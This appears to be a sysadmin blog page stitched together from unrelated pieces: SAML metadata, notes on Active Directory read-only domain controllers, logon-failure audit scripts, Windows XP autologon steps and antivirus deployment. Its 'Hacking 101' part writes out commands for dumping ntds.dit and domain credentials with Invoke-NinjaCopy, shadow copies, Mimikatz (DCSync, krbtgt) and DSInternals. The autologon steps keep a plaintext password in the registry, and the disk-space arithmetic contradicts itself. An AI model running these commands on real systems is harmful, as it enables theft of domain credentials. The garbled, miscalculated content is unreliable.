'Location' => 'https://ui.prod.kimconnect.com:8443/simplesaml/module.php/saml/sp/saml2-acs.php/default-sp',
),
1 =>
array (
'index' => 1,
'Binding' => 'urn:oasis:names:tc:SAML:1.0:profiles:browser-post',
'Location' => 'https://ui.prod.kimconnect.com:8443/simplesaml/module.php/saml/sp/saml1-acs.php/default-sp',
),
2 =>
array (
'index' => 2,
'Binding' => 'urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Artifact',
'Location' => 'https://ui.prod.kimconnect.com:8443/simplesaml/module.php/saml/sp/saml2-acs.php/default-sp',
),
3 =>
array (
'index' => 3,
'Binding' => 'urn:oasis:names:tc:SAML:1.0:profiles:artifact-01',
'Location' => 'https://ui.prod.kimconnect.com:8443/simplesaml/module.php/saml/sp/saml1-acs.php/default-sp/artifact',
),
),
'contacts' =>
array (
0 =>
array (
'emailAddress' => 'admin@kimconnect.com',
'contactType' => 'technical',
'givenName' => 'Ops',
),
),
);

$metadata['https://app01.ui.prod.kimconnect.com:8443/simplesaml/module.php/saml/sp/metadata.php/default-sp'] = array (
'SingleLogoutService' =>
array (
0 =>
array (
'Binding' => 'urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Redirect',
'Location' => 'https://app01.ui.prod.kimconnect.com:8443/simplesaml/module.php/saml/sp/saml2-logout.php/default-sp',
),
),
'AssertionConsumerService' =>
array (
0 =>
array (
'index' => 0,
'Binding' => 'urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST',
'Location' => 'https://app01.ui.prod.kimconnect.com:8443/simplesaml/module.php/saml/sp/saml2-acs.php/default-sp',
),
1 =>
array (
'index' => 1,
'Binding' => 'urn:oasis:names:tc:SAML:1.0:profiles:browser-post',
'Location' => 'https://app01.ui.prod.kimconnect.com:8443/simplesaml/module.php/saml/sp/saml1-acs.php/default-sp',
),
2 =>
array (
'index' => 2,
'Binding' => 'urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Artifact',
'Location' => 'https://app01.ui.prod.kimconnect.com:8443/simplesaml/module.php/saml/sp/saml2-acs.php/default-sp',
),
3 =>
array (
'index' => 3,
'Binding' => 'urn:oasis:names:tc:SAML:1.0:profiles:artifact-01',
'Location' => 'https://app01.ui.prod.kimconnect.com:8443/simplesaml/module.php/saml/sp/saml1-acs.php/default-sp/artifact',
),
),
'contacts' =>
array (
0 =>
array (
'emailAddress' => 'admin@kimconnect.com',
'contactType' => 'technical',
'givenName' => 'Ops',
),
),
);

$metadata['https://app02.ui.prod.kimconnect.com:8443/simplesaml/module.php/saml/sp/metadata.php/default-sp'] = array (
'SingleLogoutService' =>
array (
0 =>
array (
'Binding' => 'urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Redirect',
'Location' => 'https://app02.ui.prod.kimconnect.com:8443/simplesaml/module.php/saml/sp/saml2-logout.php/default-sp',
),
),
'AssertionConsumerService' =>
array (
0 =>
array (
'index' => 0,
'Binding' => 'urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST',
'Location' => 'https://app02.ui.prod.kimconnect.com:8443/simplesaml/module.php/saml/sp/saml2-acs.php/default-sp',
),
1 =>
array (
'index' => 1,
'Binding' => 'urn:oasis:names:tc:SAML:1.0:profiles:browser-post',
'Location' => 'https://app02.ui.prod.kimconnect.com:8443/simplesaml/module.php/saml/sp/saml1-acs.php/default-sp',
),
2 =>
array (
'index' => 2,
'Binding' => 'urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Artifact',
'Location' => 'https://app02.ui.prod.kimconnect.com:8443/simplesaml/module.php/saml/sp/saml2-acs.php/default-sp',
),
3 =>
array (
'index' => 3,
'Binding' => 'urn:oasis:names:tc:SAML:1.0:profiles:artifact-01',
'Location' => 'https://app02.ui.prod.kimconnect.com:8443/simplesaml/module.php/saml/sp/saml1-acs.php/default-sp/artifact',
),
),
'contacts' =>
array (
0 =>
array (
'emailAddress' => 'admin@kimconnect.com',
'contactType' => 'technical',
'givenName' => 'Ops',
),
),
);

Overview: ReadOnly Domain Controllers (RODC)

Starting with Windows 2008, Microsoft has created a feature called Password Replication Policy (PRP). It is an element of control on “credential caching.” In scenarios where protected groups, computer objects, and users’ credentials need to be guarded against potential breached of remote zones, their passwords will need to be non-cacheable on such RODC’s.

Furthermore, Windows 2012 adds two default security groups that automatically generates during the RODC setup process.

  1. Allowed RODC Password Replication Group : Members of this group are placed in the Allow list of the Password Replication Policies of all RODCs by default. This group has no members when Windows Server 2012 is first installed.
  2. Denied RODC Password Replication Group: Members of this group are placed in the Deny list of the Password Replication Policies of all RODCs by default. Some of the groups include Administrators, Server Operators, Backup Operators, Account Operators, and Denied RODC Password Replication Group.

Of course, the local Administrators Group are also available on RODC – this group does not exist on writable DC’s. Members of the local Administrators group will give full control over such zoned environment. Hence, the RODC local SAM architecture resembles a “member server,” rather than a typical domain controller. It’s important to note that local admin accounts on member servers and RODC’s will not propagate to the parent DC’s.

Audit Logon Successes & Failures on All Domain Controllers

Issue:

In a realistic situation, InfoSec would notify DBAdmins and SysAdmins of failed logon alerts from certain service accounts. When using Windows to check the events, this would be a typical log item.

Resolution:

Since the event log on the Database Server only shows failed logins on itself, it is necessary to check domain controller logs using the commands shown below.

# Coding aspects...

# Run Locally on Each DC
GET-EVENTLOG -Logname Security | where { $_.EntryType -eq 'FailureAudit' }

# Initiate from a Jump Box with a single DCNAME
GET-EVENTLOG -Logname Security -Computername DCNAME | where { $_.EntryType -eq 'FailureAudit' }

# Initiate from a Jump Box with access to All DCs
Import-Module ActiveDirectory
#$readWriteDCs=Get-ADDomainController -Filter * | Where-Object {$_.IsReadOnly -ne "False"} | Select Name
$allDCs=Get-ADDomainController -Filter * | Where-Object {$_.IsReadOnly -ne "False"} | Select Name
$allDCs.Name | ForEach-Object -Process {GET-EVENTLOG -Logname Security -Computername $_ | where { $_.EntryType -eq 'FailureAudit' } | export-csv "C:\Reports\$_`-LogonFailures.csv"}

The audit logs would only be available if the Group Policy (GP) Audit Logon has been set to capture Success and Failure events. Here are the steps to enable this using GP.

Locate the Default Domain Controllers Policy > Edit > navigate to Computer Configuration – Windows Settings – Advanced Audit Policy Configuration – Logon/Logoff > double-click on Audit Logon > set value = Success and Failures

Other Considerations:

1. How many events will be generated if this is turned on?

This extra logging will persist on all DCs as long as the policy is applied. The impact can be estimated using this formular:

Extra events per day = Sum((Number of Users x probability of users logon failures per user per day) +(number of service accounts x probability per account per day) + (number of computer accounts x probability per computer per day))

This would be a guess for a company of 1000 employees: ((1000 x .1) + (300 x .0001) + (1500 x 0.00001)) = 100.045 extra events will be generated per day.

2. How much disk space will this take for the extra logging?

Disk storage = Extra events per day x average size of each failure log

How about this guess: ((1000 x .01) + (300 x .0001) + (1500 x 0.00001)) x 200 bytes = 20,009 bytes per day ~ 600,270 bytes per 30-day extra logging (586.20 MBs of storage per month)

Get-WinEvent:
– Returns System.Diagnostics.Eventing.Reader.EventLogRecord.
– Uses the EventLog engine on the remote machine to filter the logs prior to sending results over the wire. This potentially reduces the amount of data to be transmitted on smaller logs.
– Can be parsed into XMLs and accessed on-the-fly:
$eventxml = $event.ToXML()
$eventxml.Event.EventData.Data
– Note: -FilterHashTable parameter only works with Windows 7 & Windows 2008R2. It will not work with Windows 2008. On these incompatible systems, use –FilterXML instead
– Syntax:

Get-EventLog: returns System.Diagnostics.EventLogEntry
– Runs approximately 2x faster than Get-WinEvent to retrieve Security logs for Audit Failures
– Example: GET-EVENTLOG -Logname Security -Computername $Server | Where { (“FailureAudit” -eq $_.EntryType) }

# Script to collect all failed logon attempts as recorded on all DCs

Import-Module ActiveDirectory;
#$allDCs=Get-ADDomainController -Filter * | Where-Object {$_.IsReadOnly -ne "False"} | Select Name
$allDCs=Get-ADDomainController -Filter * | Select Name
$allDCs.Name | ForEach-Object -Process {GET-EVENTLOG -Logname Security -Computername $_ | where { $_.EntryType -eq 'FailureAudit' } | export-csv "C:\Reports\$_`-LogonFailures.csv"}
/*
This would happen if one tries to open the file while it's being generated:
export-csv : The process cannot access the file because another process has locked a portion of the file.
At line:1 char:135
+ ... -eq 'FailureAudit' } | export-csv "C:\Reports\$_`-LogonFailures.csv"}
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Export-Csv], IOException
+ FullyQualifiedErrorId : System.IO.IOException,Microsoft.PowerShell.Commands.ExportCsvCommand
*/
# Script to audit successful logons of a particular account in the past 7 days

Import-Module ActiveDirectory;
$allDCs=Get-ADDomainController -Filter * | Select Name
$allDCs | ForEach-Object -Process {GET-EVENTLOG -Logname Security -Computername $_.Name -After (Get-Date).AddDays(-7) | where { $_.EntryType -eq 'SuccessAudit'} | where { $_.TargetUserName -eq 'svc_oitwflow' } }

Hacking 101: Domain Controllers as One of the Many Usual Targets

A potential bad actor’s full network penetration repertoire is beyond the scope of this article. Here, we’re looking at the scenario where elevated domain access has been gained by the hacker. What would be an obvious next step for this player to consider? The answer is stored somewhere inside the Ntds.dit database.

All passwords of users and computers, system objects, and group memberships are stored inside the Ntds.dit file. Hence, this is the key to the kingdom. Non-security disciplined personnel may try to simply copy this file using Windows GUI. That’s the wrong way because this is a database file that is in constant read-write locking mode by the system’s, “Kerberos Key Distribution Center,” services. These are some of the the methods to retrieve a copy of this file.

Method 1: Use an Advanced Windows Penetration tool such as PowerSploit (https://github.com/PowerShellMafia/PowerSploit)

If this module is imported, it has a function called Invoke-NinjaCopy. Yup, it’s does what its name implies. The magic is in the module’s ability to evade the System services to record any activities; hence, there would be no triggering of monitoring systems. The way Invoke-NinjaCopy accomplishs this is by accessing NTFS-partitioned raw volume I/O abstracted by the PowerShell’s Invoke-MemoryLoadLibrary.

Command: Invoke-NinjaCopy -path C:\Windows\NTDS\ntds.dit -localdestination C:\Extract\SYS\ntds.dit

Method 2: Use the Novice plain vanilla PowerShell commands

vssadmin create shadow /for=c:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy$version\Windows\ntds\ntds.dit
reg SAVE HKLM\SYSTEM C:\Extract\SYS
\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy$version\Windows\System32\config\SYSTEM C:\Extract\SYSTEM
vssadmin delete shadows /shadow=$shadowID

Now that a point-in-time NTDS.DIT has been copied, the next step is to extract password hashes and record system object IDs (beyond the scope of this writing). This process can run on any computer: Windows, Linux, or MacOS.

The advanced method is to continue using tools such as PowerSploit. There’s a function called Invoke-Mimikatz that “leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as dump credentials without ever writing the Mimikatz binary to disk.”

Commands:
Invoke-Mimikatz -DumpCreds $LSASSHash

LSADUMP::LSA – Ask LSA Server to retrieve SAM/AD enterprise (normal, patch on the fly or inject). Use to dump all Active Directory domain credentials from a Domain Controller or lsass.dmp dump file. Also used to get specific account credential such as krbtgt with the parameter /name: “/name:krbtgt”

LSADUMP::DCSync – ask a DC to synchronize an object (get password data for account).

LSADUMP::SAM – get the SysKey to decrypt SAM entries (from registry or hive). The SAM option connects to the local Security Account Manager (SAM) database and dumps credentials for local accounts. This is used to dump all local credentials on a Windows computer.

LSADUMP::Trust – Ask LSA Server to retrieve Trust Auth Information (normal or patch on the fly). Dumps trust keys (passwords) for all associated trusts (domain/forest).

Once more, it’s worth a mention that a novice approach is to use Windows. There is a PowerShell module called DSInternals that has a function named Get-ADDBAccount to perform passwords extraction. Note that there is a $key variable that I can’t show you here as somebody may violate a company’s security policies, under the “no system penetration testing without authorization” clause.

Command:
Import-Module DSInternals
Get-ADDBAccount -All -DBPath ‘C:\Extract\ntds.dit’ -BootKey $key

Note that this method only retrieves “password hashes,” not the plain-text values. Here are more DSInternals commands to illustrate follow-through:

# Decrypt a password from Group Policy Preferences
ConvertFrom-GPPrefPassword $groupPolicyPrefPassword

# Decrypt a password from Password Blob
ConvertFrom-ADManagedPasswordBlob $ADManagedPasswordBlog

# Decrypt a password from an unattend.xml file
ConvertFrom-UnattendXmlPassword $unattendXmlPassword

How to turn on automatic logon in Windows XP that is joined to a domain

Start – Run – regedit – [enter]

Locate the following registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon

Double-click DefaultUserName, type in your user name, click OK

Double-click DefaultPassword, type in your password, click OK

If there is no DefaultPassword value, create the value with the associated password.

Note that if no DefaultPassword string is specified, Windows XP automatically changes the value of the AutoAdminLogon registry key from 1 (true) to 0 (false) to turn off the AutoAdminLogon feature.

If there is no AutoAdminLogon entry, create the entry and set its value to 1

To bypass the automatic logon and log on as a different user, hold down the SHIFT key while logging off or during Windows Starting. To enforce this setting for future logoffs, set the following registry key:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon

Value:ForceAutoLogon

Type: REG_SZ

Data: 1

CA eTRust Threat Management

Install the Server Control to download updates and push the updates out to all installed agents on the network.  All agent installation should include the XLM licensing file that specifies updating behavior to be directed toward the Server Controlling machine.

Server:  eTrust Threat Management Console

Remote into MAIN01 server – Start – CA Console – Log On as Administrator

Proxy Server is under the Licensing tab.

Most machines would be added to Organization\4.X\PRIMARY and servers would be per customization

Agent Installation:

Exchange 2003 Server

  1. Install Agent as normal – Reboot
  2. Run \\MAIN01\itshare$\Software\Admin_Tools\CA_Antivirus\ITM_81\CD1-EFIGSBp\Common\Bin\eAV_Exch.OPT\setup.exe
  3. Run the eTrust Management Console by logon to SI-NT1 server
    1. Click “Organization” tab – Ensure that the specified machine name is added to the organization name. If not create a “branch” under organization called Exchange Servers
    2. Click Policy Management – Add a new policy called Exchange Servers to be associated with the Exchange Servers Organizational Branch created in previous step. Add the following executables into the exclusions list:
  • STORE.EXE
  • DSAMAIN.EXE
  • ISINTEG.EXE
  • ESEUTIL.EXE
  • MTACHECK.EXE
  • PERFWIZ.EXE
  • INETINFO.EXE
  • SRSMAIN.EXE
  • MAD.EXE
  1. Discovery tab – Organization Details – search for the Exchange server machine name to be added into the Exchange Servers organization branch.

SQL 2005

  1. Install Agent as normal – Reboot – Update Antivirus definitions
  2. Run the eTrust Management Console by logon to SI-NT1 server
    1. Click “Organization” tab – Ensure that the specified machine name is added to the organization name. If not create a “branch” under organization called SQL Servers
    2. Click Policy Management – Add a new policy called SQL Servers to be associated with the SQL Servers Organizational Branch created in previous step. Add the following executables into the exclusions list:
  • SQLSERVER.exe
  • SQLADHLP90.exe
  • SQLAGENT90.exe
  • msmdsrv.exe
  • sqlbrowser.exe
  • msftesql.exe
  • msDtsSrvr.exe
  • Sqlwriter.exe
  1. Discovery tab – Organization Details – search for the SQL server machine name to be added into the SQL Servers organization branch.

All Other Machines  – Normal Installation

  1. Run \\MAIN01\itshare$\Software\Admin_Tools\CA_Antivirus\ITM_81\CD1-EFIGSBp\setup.exe
  2. Click Next, Next, Next… to install the eTrust Threat Management Agent as a “Trial Version.”
  3. Run – cmd: copy /Y \\MAIN01\itshare$\Software\Admin_Tools\CA_Antivirus\license.xml “C:\Program Files\CA\SharedComponents\SubscriptionLicense\”
  4. Reboot

Note: “License.xml” is provided by CA when we’ve purchased the license. This file is required so that a client machine can run updates prior to being connected to the network. Pest Patrol Agent is not supported in 64bit platforms